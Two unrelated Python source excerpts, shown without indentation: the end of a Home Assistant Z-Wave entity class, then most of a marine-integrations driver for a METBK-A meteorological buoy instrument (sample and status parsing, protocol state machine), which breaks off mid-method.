self.network_value_changed, ZWaveNetwork.SIGNAL_VALUE_CHANGED
)
def network_value_changed(self, value):
"""Handle a value change on the network."""
if value.value_id in [v.value_id for v in self.values if v]:
return self.value_changed()
def value_added(self):
"""Handle a new value of this entity."""
def value_changed(self):
"""Handle a changed value for this entity's node."""
self._update_attributes()
self.update_properties()
self.maybe_schedule_update()
async def value_renamed(self, update_ids=False):
"""Rename the node and update any IDs."""
self._name = _value_name(self.values.primary)
if update_ids:
# Update entity ID.
ent_reg = await async_get_entity_registry(self.hass)
new_entity_id = ent_reg.async_generate_entity_id(
self.platform.domain,
self._name,
self.platform.entities.keys() - {self.entity_id},
)
if new_entity_id != self.entity_id:
# Don't change the name attribute, it will be None unless
# customised and if it's been customised, keep the
# customisation.
ent_reg.async_update_entity(self.entity_id, new_entity_id=new_entity_id)
return
# else for the above two ifs, update if not using update_entity
self.async_write_ha_state()
async def async_added_to_hass(self):
"""Add device to dict."""
async_dispatcher_connect(
self.hass,
SIGNAL_REFRESH_ENTITY_FORMAT.format(self.entity_id),
self.refresh_from_network,
)
def _update_attributes(self):
"""Update the node attributes. May only be used inside callback."""
self.node_id = self.node.node_id
self._name = _value_name(self.values.primary)
if not self._unique_id:
self._unique_id = self._compute_unique_id()
if self._unique_id:
self.try_remove_and_add()
if self.values.power:
self.power_consumption = round(
self.values.power.data, self.values.power.precision
)
else:
self.power_consumption = None
def update_properties(self):
"""Update on data changes for node values."""
@property
def should_poll(self):
"""No polling needed."""
return False
@property
def unique_id(self):
"""Return a unique ID."""
return self._unique_id
@property
def device_info(self):
"""Return device information."""
identifier, name = node_device_id_and_name(
self.node, self.values.primary.instance
)
info = {
"name": name,
"identifiers": {identifier},
"manufacturer": self.node.manufacturer_name,
"model": self.node.product_name,
}
if self.values.primary.instance > 1:
info["via_device"] = (DOMAIN, self.node_id)
elif self.node_id > 1:
info["via_device"] = (DOMAIN, 1)
return info
@property
def name(self):
"""Return the name of the device."""
return self._name
@property
def device_state_attributes(self):
"""Return the device specific state attributes."""
attrs = {
const.ATTR_NODE_ID: self.node_id,
const.ATTR_VALUE_INDEX: self.values.primary.index,
const.ATTR_VALUE_INSTANCE: self.values.primary.instance,
const.ATTR_VALUE_ID: str(self.values.primary.value_id),
}
if self.power_consumption is not None:
attrs[ATTR_POWER] = self.power_consumption
return attrs
def refresh_from_network(self):
"""Refresh all dependent values from zwave network."""
for value in self.values:
if value is not None:
self.node.refresh_value(value.value_id)
def _compute_unique_id(self):
if (
is_node_parsed(self.node) and self.values.primary.label != "Unknown"
) or self.node.is_ready:
return compute_value_unique_id(self.node, self.values.primary)
return None
def compute_value_unique_id(node, value):
"""Compute unique_id a value would get if it were to get one."""
return f"{node.node_id}-{value.object_id}"
|
|
"""
@package mi.instrument.star_asimet.bulkmet.metbk_a.driver
@file marine-integrations/mi/instrument/star_aismet/bulkmet/metbk_a/driver.py
@author Bill Bollenbacher
@brief Driver for the metbk_a
Release notes:
initial version
"""
__author__ = 'Bill Bollenbacher'
__license__ = 'Apache 2.0'
import re
import time
import string
import json
import time
from mi.core.log import get_logger ; log = get_logger()
from mi.core.common import BaseEnum
from mi.core.exceptions import SampleException, \
InstrumentProtocolException
from mi.core.time_tools import get_timestamp_delayed
from mi.core.instrument.instrument_protocol import CommandResponseInstrumentProtocol
from mi.core.instrument.instrument_fsm import ThreadSafeFSM
from mi.core.instrument.chunker import StringChunker
from mi.core.instrument.instrument_driver import DriverConnectionState
from mi.core.driver_scheduler import DriverSchedulerConfigKey
from mi.core.driver_scheduler import TriggerType
from mi.core.instrument.instrument_driver import SingleConnectionInstrumentDriver
from mi.core.instrument.instrument_driver import DriverEvent
from mi.core.instrument.instrument_driver import DriverAsyncEvent
from mi.core.instrument.instrument_driver import DriverProtocolState
from mi.core.instrument.instrument_driver import DriverParameter
from mi.core.instrument.instrument_driver import ResourceAgentState
from mi.core.instrument.instrument_driver import DriverConfigKey
from mi.core.instrument.data_particle import DataParticle
from mi.core.instrument.data_particle import DataParticleKey
from mi.core.instrument.data_particle import CommonDataParticleType
from mi.core.instrument.driver_dict import DriverDictKey
from mi.core.instrument.protocol_param_dict import ProtocolParameterDict, \
ParameterDictType, \
ParameterDictVisibility
# newline.
NEWLINE = '\r\n'
# default timeout.
TIMEOUT = 10
SYNC_TIMEOUT = 30
AUTO_SAMPLE_SCHEDULED_JOB = 'auto_sample'
LOGGING_STATUS_REGEX = r'.*Sampling (GO|STOPPED)'
LOGGING_STATUS_COMPILED = re.compile(LOGGING_STATUS_REGEX, re.DOTALL)
LOGGING_SYNC_REGEX = r'.*Sampling GO - synchronizing...'
LOGGING_SYNC_COMPILED = re.compile(LOGGING_STATUS_REGEX, re.DOTALL)
####
# Driver Constant Definitions
####
class ScheduledJob(BaseEnum):
ACQUIRE_STATUS = 'acquire_status'
CLOCK_SYNC = 'clock_sync'
class ProtocolState(BaseEnum):
"""
Instrument protocol states
"""
UNKNOWN = DriverProtocolState.UNKNOWN
COMMAND = DriverProtocolState.COMMAND
AUTOSAMPLE = DriverProtocolState.AUTOSAMPLE
DIRECT_ACCESS = DriverProtocolState.DIRECT_ACCESS
SYNC_CLOCK = 'PROTOCOL_STATE_SYNC_CLOCK'
class ProtocolEvent(BaseEnum):
"""
Protocol events
"""
ENTER = DriverEvent.ENTER
EXIT = DriverEvent.EXIT
DISCOVER = DriverEvent.DISCOVER
EXECUTE_DIRECT = DriverEvent.EXECUTE_DIRECT
START_DIRECT = DriverEvent.START_DIRECT
STOP_DIRECT = DriverEvent.STOP_DIRECT
GET = DriverEvent.GET
SET = DriverEvent.SET
ACQUIRE_SAMPLE = DriverEvent.ACQUIRE_SAMPLE
ACQUIRE_STATUS = DriverEvent.ACQUIRE_STATUS
CLOCK_SYNC = DriverEvent.CLOCK_SYNC
START_AUTOSAMPLE = DriverEvent.START_AUTOSAMPLE
STOP_AUTOSAMPLE = DriverEvent.STOP_AUTOSAMPLE
FLASH_STATUS = 'DRIVER_EVENT_FLASH_STATUS'
class Capability(BaseEnum):
"""
Protocol events that should be exposed to users (subset of above).
"""
GET = ProtocolEvent.GET
SET = ProtocolEvent.SET
ACQUIRE_STATUS = ProtocolEvent.ACQUIRE_STATUS
ACQUIRE_SAMPLE = ProtocolEvent.ACQUIRE_SAMPLE
CLOCK_SYNC = ProtocolEvent.CLOCK_SYNC
START_AUTOSAMPLE = ProtocolEvent.START_AUTOSAMPLE
STOP_AUTOSAMPLE = ProtocolEvent.STOP_AUTOSAMPLE
FLASH_STATUS = ProtocolEvent.FLASH_STATUS
START_DIRECT = ProtocolEvent.START_DIRECT
STOP_DIRECT = ProtocolEvent.STOP_DIRECT
class Parameter(DriverParameter):
"""
Device specific parameters.
"""
CLOCK = 'clock'
SAMPLE_INTERVAL = 'sample_interval'
class Prompt(BaseEnum):
"""
Device i/o prompts.
"""
CR_NL = NEWLINE
STOPPED = "Sampling STOPPED"
SYNC = "Sampling GO - synchronizing..."
GO = "Sampling GO"
FS = "bytes free\r" + NEWLINE
class Command(BaseEnum):
"""
Instrument command strings
"""
GET_CLOCK = "#CLOCK"
SET_CLOCK = "#CLOCK="
D = "#D"
FS = "#FS"
STAT = "#STAT"
GO = "#GO"
STOP = "#STOP"
class DataParticleType(BaseEnum):
"""
Data particle types produced by this driver
"""
RAW = CommonDataParticleType.RAW
METBK_PARSED = 'metbk_parsed'
METBK_STATUS = 'metbk_status'
###############################################################################
# Data Particles
###############################################################################
class METBK_SampleDataParticleKey(BaseEnum):
BAROMETRIC_PRESSURE = 'barometric_pressure'
RELATIVE_HUMIDITY = 'relative_humidity'
AIR_TEMPERATURE = 'air_temperature'
LONGWAVE_IRRADIANCE = 'longwave_irradiance'
PRECIPITATION = 'precipitation'
SEA_SURFACE_TEMPERATURE = 'sea_surface_temperature'
SEA_SURFACE_CONDUCTIVITY = 'sea_surface_conductivity'
SHORTWAVE_IRRADIANCE = 'shortwave_irradiance'
EASTWARD_WIND_VELOCITY = 'eastward_wind_velocity'
NORTHWARD_WIND_VELOCITY = 'northward_wind_velocity'
class METBK_SampleDataParticle(DataParticle):
_data_particle_type = DataParticleType.METBK_PARSED
@staticmethod
def regex_compiled():
"""
get the compiled regex pattern
@return: compiled re
"""
SAMPLE_DATA_PATTERN = (r'(-*\d+\.\d+)' + # BPR
'\s*(-*\d+\.\d+)' + # RH %
'\s*(-*\d+\.\d+)' + # RH temp
'\s*(-*\d+\.\d+)' + # LWR
'\s*(-*\d+\.\d+)' + # PRC
'\s*(-*\d+\.\d+)' + # ST
'\s*(-*\d+\.\d+)' + # SC
'\s*(-*\d+\.\d+)' + # SWR
'\s*(-*\d+\.\d+)' + # We
'\s*(-*\d+\.\d+)' + # Wn
'.*?' + NEWLINE) # throw away batteries
return re.compile(SAMPLE_DATA_PATTERN, re.DOTALL)
def _build_parsed_values(self):
match = METBK_SampleDataParticle.regex_compiled().match(self.raw_data)
if not match:
raise SampleException("METBK_SampleDataParticle: No regex match of parsed sample data: [%s]", self.raw_data)
result = [{DataParticleKey.VALUE_ID: METBK_SampleDataParticleKey.BAROMETRIC_PRESSURE,
DataParticleKey.VALUE: float(match.group(1))},
{DataParticleKey.VALUE_ID: METBK_SampleDataParticleKey.RELATIVE_HUMIDITY,
DataParticleKey.VALUE: float(match.group(2))},
{DataParticleKey.VALUE_ID: METBK_SampleDataParticleKey.AIR_TEMPERATURE,
DataParticleKey.VALUE: float(match.group(3))},
{DataParticleKey.VALUE_ID: METBK_SampleDataParticleKey.LONGWAVE_IRRADIANCE,
DataParticleKey.VALUE: float(match.group(4))},
{DataParticleKey.VALUE_ID: METBK_SampleDataParticleKey.PRECIPITATION,
DataParticleKey.VALUE: float(match.group(5))},
{DataParticleKey.VALUE_ID: METBK_SampleDataParticleKey.SEA_SURFACE_TEMPERATURE,
DataParticleKey.VALUE: float(match.group(6))},
{DataParticleKey.VALUE_ID: METBK_SampleDataParticleKey.SEA_SURFACE_CONDUCTIVITY,
DataParticleKey.VALUE: float(match.group(7))},
{DataParticleKey.VALUE_ID: METBK_SampleDataParticleKey.SHORTWAVE_IRRADIANCE,
DataParticleKey.VALUE: float(match.group(8))},
{DataParticleKey.VALUE_ID: METBK_SampleDataParticleKey.EASTWARD_WIND_VELOCITY,
DataParticleKey.VALUE: float(match.group(9))},
{DataParticleKey.VALUE_ID: METBK_SampleDataParticleKey.NORTHWARD_WIND_VELOCITY,
DataParticleKey.VALUE: float(match.group(10))}]
log.debug("METBK_SampleDataParticle._build_parsed_values: result=%s" %result)
return result
class METBK_StatusDataParticleKey(BaseEnum):
INSTRUMENT_MODEL = 'instrument_model'
SERIAL_NUMBER = 'serial_number'
CALIBRATION_DATE = 'calibration_date'
FIRMWARE_VERSION = 'firmware_version'
DATE_TIME_STRING = 'date_time_string'
LOGGING_INTERVAL = 'logging_interval'
CURRENT_TICK = 'current_tick'
RECENT_RECORD_INTERVAL = 'recent_record_interval'
FLASH_CARD_PRESENCE = 'flash_card_presence'
BATTERY_VOLTAGE_MAIN = 'battery_voltage_main'
FAILURE_MESSAGES = 'failure_messages'
PTT_ID1 = 'ptt_id1'
PTT_ID2 = 'ptt_id2'
PTT_ID3 = 'ptt_id3'
SAMPLING_STATE = 'sampling_state'
class METBK_StatusDataParticle(DataParticle):
_data_particle_type = DataParticleType.METBK_STATUS
@staticmethod
def regex_compiled():
"""
get the compiled regex pattern
@return: compiled re
"""
STATUS_DATA_PATTERN = (r'Model:\s+(.+?)\r\n' +
'SerNum:\s+(.+?)\r\n' +
'CfgDat:\s+(.+?)\r\n' +
'Firmware:\s+(.+?)\r\n' +
'RTClock:\s+(.+?)\r\n' +
'Logging Interval:\s+(\d+);\s+' +
'Current Tick:\s+(\d+)\r\n' +
'R-interval:\s+(.+?)\r\n' +
'(.+?)\r\n' + # compact flash info
'Main Battery Voltage:\s+(.+?)\r\n' +
'(.+?)' + # module failures & PTT messages
'\r\nSampling\s+(\w+)\r\n')
return re.compile(STATUS_DATA_PATTERN, re.DOTALL)
def _build_parsed_values(self):
log.debug("METBK_StatusDataParticle: input = %s" %self.raw_data)
match = METBK_StatusDataParticle.regex_compiled().match(self.raw_data)
if not match:
raise SampleException("METBK_StatusDataParticle: No regex match of parsed status data: [%s]", self.raw_data)
result = [{DataParticleKey.VALUE_ID: METBK_StatusDataParticleKey.INSTRUMENT_MODEL,
DataParticleKey.VALUE: match.group(1)},
{DataParticleKey.VALUE_ID: METBK_StatusDataParticleKey.SERIAL_NUMBER,
DataParticleKey.VALUE: match.group(2)},
{DataParticleKey.VALUE_ID: METBK_StatusDataParticleKey.CALIBRATION_DATE,
DataParticleKey.VALUE: match.group(3)},
{DataParticleKey.VALUE_ID: METBK_StatusDataParticleKey.FIRMWARE_VERSION,
DataParticleKey.VALUE: match.group(4)},
{DataParticleKey.VALUE_ID: METBK_StatusDataParticleKey.DATE_TIME_STRING,
DataParticleKey.VALUE: match.group(5)},
{DataParticleKey.VALUE_ID: METBK_StatusDataParticleKey.LOGGING_INTERVAL,
DataParticleKey.VALUE: int(match.group(6))},
{DataParticleKey.VALUE_ID: METBK_StatusDataParticleKey.CURRENT_TICK,
DataParticleKey.VALUE: int(match.group(7))},
{DataParticleKey.VALUE_ID: METBK_StatusDataParticleKey.RECENT_RECORD_INTERVAL,
DataParticleKey.VALUE: int(match.group(8))},
{DataParticleKey.VALUE_ID: METBK_StatusDataParticleKey.FLASH_CARD_PRESENCE,
DataParticleKey.VALUE: match.group(9)},
{DataParticleKey.VALUE_ID: METBK_StatusDataParticleKey.BATTERY_VOLTAGE_MAIN,
DataParticleKey.VALUE: float(match.group(10))},
{DataParticleKey.VALUE_ID: METBK_StatusDataParticleKey.SAMPLING_STATE,
DataParticleKey.VALUE: match.group(12)}]
lines = match.group(11).split(NEWLINE)
length = len(lines)
print ("length=%d; lines=%s" %(length, lines))
if length < 3:
raise SampleException("METBK_StatusDataParticle: Not enough PTT lines in status data: [%s]", self.raw_data)
# grab PTT lines
result.append({DataParticleKey.VALUE_ID: METBK_StatusDataParticleKey.PTT_ID1,
DataParticleKey.VALUE: lines[length-3]})
result.append({DataParticleKey.VALUE_ID: METBK_StatusDataParticleKey.PTT_ID2,
DataParticleKey.VALUE: lines[length-2]})
result.append({DataParticleKey.VALUE_ID: METBK_StatusDataParticleKey.PTT_ID3,
DataParticleKey.VALUE: lines[length-1]})
# grab any module failure lines
if length > 3:
length -= 3
failures = []
for index in range(0, length):
failures.append(lines[index])
result.append({DataParticleKey.VALUE_ID: METBK_StatusDataParticleKey.FAILURE_MESSAGES,
DataParticleKey.VALUE: failures})
log.debug("METBK_StatusDataParticle: result = %s" %result)
return result
###############################################################################
# Driver
###############################################################################
class InstrumentDriver(SingleConnectionInstrumentDriver):
"""
InstrumentDriver subclass
Subclasses SingleConnectionInstrumentDriver with connection state
machine.
"""
def __init__(self, evt_callback):
"""
Driver constructor.
@param evt_callback Driver process event callback.
"""
#Construct superclass.
SingleConnectionInstrumentDriver.__init__(self, evt_callback)
########################################################################
# Superclass overrides for resource query.
########################################################################
def get_resource_params(self):
"""
Return list of device parameters available.
"""
return Parameter.list()
########################################################################
# Protocol builder.
########################################################################
def _build_protocol(self):
"""
Construct the driver protocol state machine.
"""
self._protocol = Protocol(Prompt, NEWLINE, self._driver_event)
###########################################################################
# Protocol
###########################################################################
class Protocol(CommandResponseInstrumentProtocol):
"""
Instrument protocol class
Subclasses CommandResponseInstrumentProtocol
"""
last_sample = ''
def __init__(self, prompts, newline, driver_event):
"""
Protocol constructor.
@param prompts A BaseEnum class containing instrument prompts.
@param newline The newline.
@param driver_event Driver process event callback.
"""
# Construct protocol superclass.
CommandResponseInstrumentProtocol.__init__(self, prompts, newline, driver_event)
# Build protocol state machine.
self._protocol_fsm = ThreadSafeFSM(ProtocolState, ProtocolEvent, ProtocolEvent.ENTER, ProtocolEvent.EXIT)
# Add event handlers for protocol state machine.
self._protocol_fsm.add_handler(ProtocolState.UNKNOWN, ProtocolEvent.ENTER, self._handler_unknown_enter)
self._protocol_fsm.add_handler(ProtocolState.UNKNOWN, ProtocolEvent.EXIT, self._handler_unknown_exit)
self._protocol_fsm.add_handler(ProtocolState.UNKNOWN, ProtocolEvent.DISCOVER, self._handler_unknown_discover)
self._protocol_fsm.add_handler(ProtocolState.COMMAND, ProtocolEvent.ENTER, self._handler_command_enter)
self._protocol_fsm.add_handler(ProtocolState.COMMAND, ProtocolEvent.EXIT, self._handler_command_exit)
self._protocol_fsm.add_handler(ProtocolState.COMMAND, ProtocolEvent.ACQUIRE_SAMPLE, self._handler_acquire_sample)
self._protocol_fsm.add_handler(ProtocolState.COMMAND, ProtocolEvent.START_DIRECT, self._handler_command_start_direct)
self._protocol_fsm.add_handler(ProtocolState.COMMAND, ProtocolEvent.CLOCK_SYNC, self._handler_command_sync_clock)
self._protocol_fsm.add_handler(ProtocolState.COMMAND, ProtocolEvent.GET, self._handler_get)
self._protocol_fsm.add_handler(ProtocolState.COMMAND, ProtocolEvent.SET, self._handler_command_set)
self._protocol_fsm.add_handler(ProtocolState.COMMAND, ProtocolEvent.START_AUTOSAMPLE, self._handler_command_start_autosample)
self._protocol_fsm.add_handler(ProtocolState.COMMAND, ProtocolEvent.FLASH_STATUS, self._handler_flash_status)
self._protocol_fsm.add_handler(ProtocolState.COMMAND, ProtocolEvent.ACQUIRE_STATUS, self._handler_acquire_status)
self._protocol_fsm.add_handler(ProtocolState.AUTOSAMPLE, ProtocolEvent.ENTER, self._handler_autosample_enter)
self._protocol_fsm.add_handler(ProtocolState.AUTOSAMPLE, ProtocolEvent.EXIT, self._handler_autosample_exit)
self._protocol_fsm.add_handler(ProtocolState.AUTOSAMPLE, ProtocolEvent.STOP_AUTOSAMPLE, self._handler_autosample_stop_autosample)
self._protocol_fsm.add_handler(ProtocolState.AUTOSAMPLE, ProtocolEvent.ACQUIRE_SAMPLE, self._handler_acquire_sample)
self._protocol_fsm.add_handler(ProtocolState.AUTOSAMPLE, ProtocolEvent.CLOCK_SYNC, self._handler_autosample_sync_clock)
self._protocol_fsm.add_handler(ProtocolState.AUTOSAMPLE, ProtocolEvent.GET, self._handler_get)
self._protocol_fsm.add_handler(ProtocolState.AUTOSAMPLE, ProtocolEvent.FLASH_STATUS, self._handler_flash_status)
self._protocol_fsm.add_handler(ProtocolState.AUTOSAMPLE, ProtocolEvent.ACQUIRE_STATUS, self._handler_acquire_status)
# We setup a new state for clock sync because then we could use the state machine so the autosample scheduler
# is disabled before we try to sync the clock. Otherwise there could be a race condition introduced when we
# are syncing the clock and the scheduler requests a sample.
self._protocol_fsm.add_handler(ProtocolState.SYNC_CLOCK, ProtocolEvent.ENTER, self._handler_sync_clock_enter)
self._protocol_fsm.add_handler(ProtocolState.SYNC_CLOCK, ProtocolEvent.CLOCK_SYNC, self._handler_sync_clock_sync)
self._protocol_fsm.add_handler(ProtocolState.DIRECT_ACCESS, ProtocolEvent.ENTER, self._handler_direct_access_enter)
self._protocol_fsm.add_handler(ProtocolState.DIRECT_ACCESS, ProtocolEvent.EXIT, self._handler_direct_access_exit)
self._protocol_fsm.add_handler(ProtocolState.DIRECT_ACCESS, ProtocolEvent.EXECUTE_DIRECT, self._handler_direct_access_execute_direct)
self._protocol_fsm.add_handler(ProtocolState.DIRECT_ACCESS, ProtocolEvent.STOP_DIRECT, self._handler_direct_access_stop_direct)
# Add build handlers for device commands.
self._add_build_handler(Command.GET_CLOCK, self._build_simple_command)
self._add_build_handler(Command.SET_CLOCK, self._build_set_clock_command)
self._add_build_handler(Command.D, self._build_simple_command)
self._add_build_handler(Command.GO, self._build_simple_command)
self._add_build_handler(Command.STOP, self._build_simple_command)
self._add_build_handler(Command.FS, self._build_simple_command)
self._add_build_handler(Command.STAT, self._build_simple_command)
# Add response handlers for device commands.
self._add_response_handler(Command.GET_CLOCK, self._parse_clock_response)
self._add_response_handler(Command.SET_CLOCK, self._parse_clock_response)
self._add_response_handler(Command.FS, self._parse_fs_response)
self._add_response_handler(Command.STAT, self._parse_common_response)
# Construct the parameter dictionary containing device parameters,
# current parameter values, and set formatting functions.
self._build_param_dict()
self._build_command_dict()
self._build_driver_dict()
self._chunker = StringChunker(Protocol.sieve_function)
self._add_scheduler_event(ScheduledJob.ACQUIRE_STATUS, ProtocolEvent.ACQUIRE_STATUS)
self._add_scheduler_event(ScheduledJob.CLOCK_SYNC, ProtocolEvent.CLOCK_SYNC)
# Start state machine in UNKNOWN state.
self._protocol_fsm.start(ProtocolState.UNKNOWN)
@staticmethod
def sieve_function(raw_data):
"""
The method that splits samples and status
"""
matchers = []
return_list = []
matchers.append(METBK_SampleDataParticle.regex_compiled())
matchers.append(METBK_StatusDataParticle.regex_compiled())
for matcher in matchers:
for match in matcher.finditer(raw_data):
return_list.append((match.start(), match.end()))
return return_list
def _got_chunk(self, chunk, timestamp):
"""
The base class got_data has gotten a chunk from the chunker. Pass it to extract_sample
with the appropriate particle objects and REGEXes.
"""
log.debug("_got_chunk: chunk=%s" %chunk)
self._extract_sample(METBK_SampleDataParticle, METBK_SampleDataParticle.regex_compiled(), chunk, timestamp)
self._extract_sample(METBK_StatusDataParticle, METBK_StatusDataParticle.regex_compiled(), chunk, timestamp)
def _filter_capabilities(self, events):
"""
Return a list of currently available capabilities.
"""
return [x for x in events if Capability.has(x)]
########################################################################
# override methods from base class.
########################################################################
def _extract_sample(self, particle_class, regex, line, timestamp, publish=True):
"""
Overridden to add duplicate sample checking. This duplicate checking should only be performed
on sample chunks and not other chunk types, therefore the regex is performed before the string checking.
Extract sample from a response line if present and publish parsed particle
@param particle_class The class to instantiate for this specific
data particle. Parameterizing this allows for simple, standard
behavior from this routine
@param regex The regular expression that matches a data sample
@param line string to match for sample.
@param timestamp port agent timestamp to include with the particle
@param publish boolean to publish samples (default True). If True,
two different events are published: one to notify raw data and
the other to notify parsed data.
@retval dict of dicts {'parsed': parsed_sample, 'raw': raw_sample} if
the line can be parsed for a sample. Otherwise, None.
@todo Figure out how the agent wants the results for a single poll
and return them that way from here
"""
match = regex.match(line)
if match:
if particle_class == METBK_SampleDataParticle:
# check to see if there is a delta from last sample, and don't parse this sample if there isn't
if match.group(0) == self.last_sample:
return
# save this sample as last_sample for next check
self.last_sample = match.group(0)
particle = particle_class(line, port_timestamp=timestamp)
parsed_sample = particle.generate()
if publish and self._driver_event:
self._driver_event(DriverAsyncEvent.SAMPLE, parsed_sample)
return parsed_sample
########################################################################
# implement virtual methods from base class.
########################################################################
def apply_startup_params(self):
"""
Apply sample_interval startup parameter.
"""
config = self.get_startup_config()
log.debug("apply_startup_params: startup config = %s" %config)
if config.has_key(Parameter.SAMPLE_INTERVAL):
log.debug("apply_startup_params: setting sample_interval to %d" %config[Parameter.SAMPLE_INTERVAL])
self._param_dict.set_value(Parameter.SAMPLE_INTERVAL, config[Parameter.SAMPLE_INTERVAL])
########################################################################
# Unknown handlers.
########################################################################
def _handler_unknown_enter(self, *args, **kwargs):
"""
Enter unknown state.
"""
# Tell driver superclass to send a state change event.
# Superclass will query the state.
self._driver_event(DriverAsyncEvent.STATE_CHANGE)
def _handler_unknown_exit(self, *args, **kwargs):
"""
Exit unknown state.
"""
pass
def _handler_unknown_discover(self, *args, **kwargs):
"""
Discover current state; can only be COMMAND (instrument has no actual AUTOSAMPLE mode).
@retval (next_state, result), (ProtocolState.COMMAND, None) if successful.
"""
(protocol_state, agent_state) = self._discover()
# If we are just starting up and we land in command mode then our state should
# be idle
if(agent_state == ResourceAgentState.COMMAND):
agent_state = ResourceAgentState.IDLE
log.debug("_handler_unknown_discover: state = %s", protocol_state)
return (protocol_state, agent_state)
########################################################################
# Clock Sync handlers.
# Not much to do in this state except sync the clock then transition
# back to autosample. When in command mode we don't have to worry about
# stopping the scheduler so we just sync the clock without state
# transitions
########################################################################
def _handler_sync_clock_enter(self, *args, **kwargs):
"""
Enter sync clock state.
"""
# Tell driver superclass to send a state change event.
# Superclass will query the state.
self._driver_event(DriverAsyncEvent.STATE_CHANGE)
self._protocol_fsm.on_event(ProtocolEvent.CLOCK_SYNC)
def _handler_sync_clock_sync(self, *args, **kwargs):
"""
Sync the clock
"""
next_state = ProtocolState.AUTOSAMPLE
next_agent_state = ResourceAgentState.STREAMING
result = None
self._sync_clock()
self._async_agent_state_change(ResourceAgentState.STREAMING)
return(next_state,(next_agent_state, result))
########################################################################
# Command handlers.
# just implemented to make DA possible, instrument has no actual command mode
########################################################################
def _handler_command_enter(self, *args, **kwargs):
"""
Enter command state.
"""
self._init_params()
# Tell driver superclass to send a state change event.
# Superclass will query the state.
self._driver_event(DriverAsyncEvent.STATE_CHANGE)
def _handler_command_exit(self, *args, **kwargs):
"""
Exit command state.
"""
pass
def _handler_command_set(self, *args, **kwargs):
"""
no writable parameters so does nothing, just implemented to make framework happy
"""
next_state = None
result = None
return (next_state, result)
def _handler_command_start_direct(self, *args, **kwargs):
"""
"""
result = None
next_state = ProtocolState.DIRECT_ACCESS
next_agent_state = ResourceAgentState.DIRECT_ACCESS
return (next_state, (next_agent_state, result))
def _handler_command_start_autosample(self, *args, **kwargs):
"""
"""
result = None
next_state = ProtocolState.AUTOSAMPLE
next_agent_state = ResourceAgentState.STREAMING
self._start_logging()
return (next_state, (next_agent_state, result))
def _handler_command_sync_clock(self, *args, **kwargs):
"""
sync clock close to a second edge
@retval (next_state, (next_agent_state, result)) tuple, (None, (None, None)).
@throws InstrumentTimeoutException if device respond correctly.
@throws InstrumentProtocolException if command could not be built or misunderstood.
"""
next_state = None
next_agent_state = None
result = None
self._sync_clock()
return(next_state,(next_agent_state, result))
########################################################################
# autosample handlers.
########################################################################
def _handler_autosample_enter(self, *args, **kwargs):
"""
Enter autosample state Because this is an instrument that must be
polled we need to ensure the scheduler is added when we are in an
autosample state. This scheduler raises events to poll the
instrument for data.
"""
self._init_params()
self._ensure_autosample_config()
self._add_scheduler_event(AUTO_SAMPLE_SCHEDULED_JOB, ProtocolEvent.ACQUIRE_SAMPLE)
# Tell driver superclass to send a state change event.
# Superclass will query the state.
self._driver_event(DriverAsyncEvent.STATE_CHANGE)
def _handler_autosample_exit(self, *args, **kwargs):
"""
exit autosample state.
"""
self._remove_scheduler(AUTO_SAMPLE_SCHEDULED_JOB)
def _handler_autosample_stop_autosample(self, *args, **kwargs):
"""
"""
result = None
next_state = ProtocolState.COMMAND
next_agent_state = ResourceAgentState.COMMAND
self._stop_logging()
return (next_state, (next_agent_state, result))
def _handler_autosample_sync_clock(self, *args, **kwargs):
"""
sync clock close to a second edge
@retval (next_state, (next_agent_state, result)) tuple, (None, (None, None)).
@throws InstrumentTimeoutException if device respond correctly.
@throws InstrumentProtocolException if command could not be built or misunderstood.
"""
next_state = ProtocolState.SYNC_CLOCK
next_agent_state = ResourceAgentState.BUSY
result = None
return(next_state,(next_agent_state, result))
########################################################################
# Direct access handlers.
########################################################################
def _handler_direct_access_enter(self, *args, **kwargs):
"""
Enter direct access state.
"""
# Tell driver superclass to send a state change event.
# Superclass will query the state.
self._driver_event(DriverAsyncEvent.STATE_CHANGE)
self._sent_cmds = []
def _handler_direct_access_exit(self, *args, **kwargs):
"""
Exit direct access state.
"""
pass
def _handler_direct_access_execute_direct(self, data):
next_state = None
result = None
self._do_cmd_direct(data)
return (next_state, result)
def _handler_direct_access_stop_direct(self):
result = None
(next_state, next_agent_state) = self._discover()
return (next_state, (next_agent_state, result))
########################################################################
# general handlers.
########################################################################
def _handler_flash_status(self, *args, **kwargs):
"""
Acquire flash status from instrument.
@retval (next_state, (next_agent_state, result)) tuple, (None, (None, None)).
@throws InstrumentTimeoutException if device cannot be woken for command.
@throws InstrumentProtocolException if command could not be built or misunderstood.
"""
next_state = None
next_agent_state = None
result = None
result = self._do_cmd_resp(Command.FS, expected_prompt=Prompt.FS)
log.debug("FLASH RESULT: %s", result)
return (next_state, (next_agent_state, result))
def _handler_acquire_sample(self, *args, **kwargs):
"""
Acquire sample from instrument.
@retval (next_state, (next_agent_state, result)) tuple, (None, (None, None)).
@throws InstrumentTimeoutException if device cannot be woken for command.
@throws InstrumentProtocolException if command could not be built or misunderstood.
"""
next_state = None
next_agent_state = None
result = None
result = self._do_cmd_resp(Command.D, *args, **kwargs)
return (next_state, (next_agent_state, result))
def _handler_acquire_status(self, *args, **kwargs):
"""
Acquire status from instrument.
@retval (next_state, (next_agent_state, result)) tuple, (None, (None, None)).
@throws InstrumentTimeoutException if device cannot be woken for command.
@throws InstrumentProtocolException if command could not be built or misunderstood.
"""
next_state = None
next_agent_state = None
result = None
log.debug( "Logging status: %s", self._is_logging())
result = self._do_cmd_resp(Command.STAT, expected_prompt=[Prompt.STOPPED, Prompt.GO])
return (next_state, (next_agent_state, result))
########################################################################
# Private helpers.
########################################################################
def _set_params(self, *args, **kwargs):
"""
Overloaded from the base class, used in apply DA params. Not needed
here so just noop it.
"""
pass
def _discover(self, *args, **kwargs):
"""
Discover current state; can only be COMMAND (instrument has no actual AUTOSAMPLE mode).
@retval (next_state, result), (ProtocolState.COMMAND, None) if successful.
"""
logging = self._is_logging()
if(logging == True):
protocol_state = ProtocolState.AUTOSAMPLE
agent_state = ResourceAgentState.STREAMING
elif(logging == False):
protocol_state = ProtocolState.COMMAND
agent_state = ResourceAgentState.COMMAND
else:
protocol_state = ProtocolState.UNKNOWN
agent_state = ResourceAgentState.ACTIVE_UNKNOWN
return (protocol_state, agent_state)
def _start_logging(self):
"""
start the instrument logging if is isn't running already.
"""
if(not self._is_logging()):
log.debug("Sending start logging command: %s", Command.GO)
self._do_cmd_resp(Command.GO, expected_prompt=Prompt.GO)
def _stop_logging(self):
"""
stop the instrument logging if is is running. When the instrument
is in a syncing state we can not stop logging. We must wait before
we sent the stop command.
"""
if(self._is_logging()):
